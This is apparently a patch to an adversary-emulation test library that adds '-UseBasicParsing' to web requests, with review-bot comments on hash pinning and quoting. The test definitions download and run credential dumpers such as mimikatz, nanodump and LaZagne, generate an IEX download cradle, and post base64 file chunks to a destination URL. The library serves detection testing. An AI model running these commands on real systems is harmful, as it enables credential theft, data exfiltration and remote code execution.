From cb5b02d3a542ac10a6a75ae5022a455bfbcf46e2 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 13 Dec 2025 17:23:17 -0500 Subject: [PATCH] add -UseBasicParsing --- atomics/T1003.001/T1003.001.yaml | 14 +++++------ atomics/T1030/T1030.yaml | 2 +- atomics/T1036/T1036.yaml | 2 +- .../T1059.001/src/Invoke-DownloadCradle.ps1 | 2 +- atomics/T1072/T1072.yaml | 6 ++--- atomics/T1078.003/T1078.003.yaml | 2 +- atomics/T1087.002/T1087.002.yaml | 10 ++++---- atomics/T1090.003/T1090.003.yaml | 6 ++--- atomics/T1127/T1127.yaml | 4 ++-- atomics/T1134.005/T1134.005.yaml | 2 +- atomics/T1546.007/T1546.007.yaml | 2 +- atomics/T1546.010/T1546.010.yaml | 8 +++---- atomics/T1555.003/T1555.003.yaml | 24 +++++++++---------- atomics/T1560.001/T1560.001.yaml | 2 +- atomics/T1562.010/T1562.010.yaml | 2 +- atomics/T1564.006/T1564.006.yaml | 4 ++-- atomics/T1572/T1572.yaml | 2 +- atomics/T1595.003/src/WebServerScan.ps1 | 4 ++-- 18 files changed, 49 insertions(+), 49 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 9a6123c9..4ee322b3 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml 
@@ -30,7 +30,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -UseBasicParsing Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force @@ -81,7 +81,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null - Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}" + Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}" -UseBasicParsing executor: command: | "#{dumpert_exe}" 
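Review bot: Both hunks fetch an executable (`Procdump.zip`, `Outflank-Dumpert.exe`) that the executor then runs, and nothing checks what was downloaded before it is executed; adding `-UseBasicParsing` does not change that. For the URLs that already pin a commit, as the Dumpert one does, the expected digest is stable, and a one-line check after the download would catch a tampered or silently replaced file, e.g. `if ((Get-FileHash "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -Algorithm SHA256).Hash -ne "<EXPECTED_SHA256>") { throw "Procdump.zip hash mismatch" }` with the placeholder filled in from a trusted copy. The same point applies to every download hunk in this patch, most of all to those that pull from moving targets: `master` (T1087.002, T1127, T1546.007, T1546.010, T1564.006), `latest` (the plink download in T1560.001 and T1562.010) and the newest GitHub release (the mimikatz API lookups in T1003.001 and T1134.005).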
@@ -109,7 +109,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" + Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -UseBasicParsing executor: command: | PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp" @@ -164,7 +164,7 @@ atomic_tests: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" - $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } + $zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } $basePath = Split-Path "#{mimikatz_exe}" | Split-Path Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath - description: | 
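Review bot: In the second hunk (`@@ -164`), `Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json` does by hand what `Invoke-RestMethod` does natively: it parses the JSON body itself and takes no `-UseBasicParsing`, so `$zipUrl = (Invoke-RestMethod $releases)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }` is the simpler form. Whichever cmdlet is used, `[0]` selects whatever release the API happens to list first, so this prerequisite fetches an unpinned binary while the other downloads in this file reference a fixed commit; that deserves at least a comment in the yaml, if not a pinned release URL. The same pattern is in T1134.005 (`@@ -32`).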
@@ -274,7 +274,7 @@ atomic_tests: if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -UseBasicParsing Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force @@ -355,7 +355,7 @@ atomic_tests: if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} -UseBasicParsing executor: command: | #{xordump_exe} -out #{output_file} -x 0x41 
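Review bot: The `@@ -274` prerequisite downloads the same `Procdump.zip` as the `@@ -30` hunk but omits the `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line the earlier one sets before calling Invoke-WebRequest; on a Windows PowerShell host with an older default protocol list that line may be what lets the download succeed, and `-UseBasicParsing` is no substitute for it. Adding the same line at the top of this `get_prereq_command` makes the two Procdump prerequisites behave alike. In the `@@ -355` hunk, `-OutFile #{xordump_exe}` is the only unquoted `-OutFile` argument in the visible hunks of this file; `-OutFile "#{xordump_exe}"` keeps a path containing a space from splitting into two arguments.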
@@ -422,7 +422,7 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" + Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -UseBasicParsing executor: command: | PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}" diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 02989e8d..811252af 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -60,6 +60,6 @@ atomic_tests: while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) - Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk -UseBasicParsing } $file.Close() diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index cb285faa..835df0d8 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml 
@@ -30,7 +30,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" + Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -UseBasicParsing executor: command: |- Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force diff --git a/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 b/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 index 175750fd..ea051455 100755 --- a/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 +++ b/atomics/T1059.001/src/Invoke-DownloadCradle.ps1 @@ -148,7 +148,7 @@ Invoke-DownloadCradle -Type Powershell -Command $Command "Powershell Invoke-WebRequest" If ($PSVersionTable.PSVersion.Major -gt 2){ - $Command = "(`'" + $Url[0] + "`'|ForEach-Object{(IWR (Item Variable:\_).Value)}) | IEX" + $Command = "(`'" + $Url[0] + "`'|ForEach-Object{(IWR (Item Variable:\_).Value -UseBasicParsing)}) | IEX" Invoke-DownloadCradle -Type Powershell -Command $Command } Else{"`tMethod supported on Powershell 3.0 and above only`n"} diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml index 67a1870f..92effbb8 100644 --- a/atomics/T1072/T1072.yaml +++ b/atomics/T1072/T1072.yaml 
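Review bot: `Invoke-WebRequest #{url} -OutFile ...` passes the `url` input argument unquoted, so a substituted value containing `&` or another character PowerShell treats as an operator would not be parsed as a single argument; `Invoke-WebRequest "#{url}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -UseBasicParsing` removes that dependence on the default value, and matches how the literal URL with `&` in it is quoted in T1555.003 (`@@ -432`). The same unquoted placeholder is in T1572 (`Invoke-WebRequest #{download} -OutFile ...`).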
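Review bot: The change alters the cradle text this script emits (`IWR (Item Variable:\_).Value -UseBasicParsing`), which is the command line process telemetry will record when the test runs; anything that validated this test against the previous string should be re-run. The `-gt 2` version guard on the line above still matches, since Invoke-WebRequest and its `-UseBasicParsing` switch exist from PowerShell 3.0. The enclosing script body continues outside the hunk.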
@@ -25,7 +25,7 @@ atomic_tests: get_prereq_command: | Write-Host Downloading radmin installer New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" + Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" -UseBasicParsing Write-Host Install Radmin Start-Process msiexec -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn executor: @@ -58,7 +58,7 @@ atomic_tests: get_prereq_command: | Write-Host Downloading PDQ Deploy installer New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" + Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -UseBasicParsing Write-Host Install PDQ Deploy Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s" executor: @@ -81,7 +81,7 @@ atomic_tests: if (Test-Path "${env:ProgramFiles(x86)}\Chocolatey\choco.exe") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading Chocolatey installer - Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1" + Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1" -UseBasicParsing Write-Host Installing Chocolatey Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File chocolatey-install.ps1" -Wait executor: 
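Review bot: In the third hunk (`@@ -81`), `-OutFile "chocolatey-install.ps1"` writes the installer into whatever the current directory is and the next line runs it from there with `-ExecutionPolicy Bypass`, while the two prerequisites above place their downloads under `PathToAtomicsFolder\..\ExternalPayloads\` after creating that directory; a relative path depends on the caller's working directory and leaves a script behind wherever the test was launched. Downloading to `"PathToAtomicsFolder\..\ExternalPayloads\chocolatey-install.ps1"`, pointing the `-File` argument at that same path, and adding the `New-Item -Type Directory ... | Out-Null` line the sibling hunks use keeps the three prerequisites consistent. None of the three sets a `SecurityProtocol` line before its download, unlike T1003.001; worth checking whether the hosts this targets need it.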
diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index bb3d9fd6..047cf825 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml @@ -214,7 +214,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index 8a246427..b1b88364 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -60,7 +60,7 @@ atomic_tests: if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}" + Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}" -UseBasicParsing executor: command: | Invoke-Expression "#{adrecon_path}" 
@@ -87,7 +87,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties @@ -112,7 +112,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args} 
@@ -137,7 +137,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args} @@ -162,7 +162,7 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null - Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args} diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index f8ff38a0..0801b5bf 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml 
@@ -28,14 +28,14 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe" + Invoke-WebRequest "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe" -UseBasicParsing - description: | Batch file containing commands to run must be in src directory prereq_command: | if (Test-Path "PathToAtomicsFolder\T1090.003\src\Psiphon.bat") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\T1090.003\src\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" -UseBasicParsing executor: name: powershell command: | @@ -65,7 +65,7 @@ atomic_tests: if (Test-Path "#{TorExe}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" + Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -UseBasicParsing expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\tor" executor: command: | 
diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 533157e5..4d242556 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -30,7 +30,7 @@ atomic_tests: if (Test-Path "#(unknown)") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#(unknown)") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#(unknown)" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#(unknown)" -UseBasicParsing executor: command: | copy "#(unknown)" %TEMP%\hello.js @@ -69,7 +69,7 @@ atomic_tests: if (Test-Path "#(unknown)") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#(unknown)") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#(unknown)" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#(unknown)" -UseBasicParsing executor: command: | copy "#(unknown)" %TEMP%\LibHello.js diff --git a/atomics/T1134.005/T1134.005.yaml b/atomics/T1134.005/T1134.005.yaml index f5603092..258e7799 100644 --- a/atomics/T1134.005/T1134.005.yaml +++ b/atomics/T1134.005/T1134.005.yaml 
@@ -32,7 +32,7 @@ atomic_tests: New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" - $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } + $zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } $mimikatz_exe = cmd /c echo #{mimikatz_path} $basePath = Split-Path $mimikatz_exe | Split-Path Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath diff --git a/atomics/T1546.007/T1546.007.yaml b/atomics/T1546.007/T1546.007.yaml index ca4a43cb..b0b013bb 100644 --- a/atomics/T1546.007/T1546.007.yaml +++ b/atomics/T1546.007/T1546.007.yaml @@ -24,7 +24,7 @@ atomic_tests: if (Test-Path "#{helper_file}") { exit 0} else { exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{helper_file}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" -UseBasicParsing executor: command: | netsh.exe add helper "#{helper_file}" diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index cc7a25aa..4c340ce6 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml 
@@ -30,16 +30,16 @@ atomic_tests: get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path "#{registry_file}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" -UseBasicParsing - description: | DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) prereq_command: | if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll -UseBasicParsing executor: command: | reg.exe import "#{registry_file}" diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index f549e1a9..1a945202 100644 
--- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -25,7 +25,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" + Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" -UseBasicParsing Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force executor: @@ -72,7 +72,7 @@ atomic_tests: if (Test-Path "#{lazagne_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{lazagne_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}" + Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}" -UseBasicParsing executor: name: command_prompt elevation_required: true 
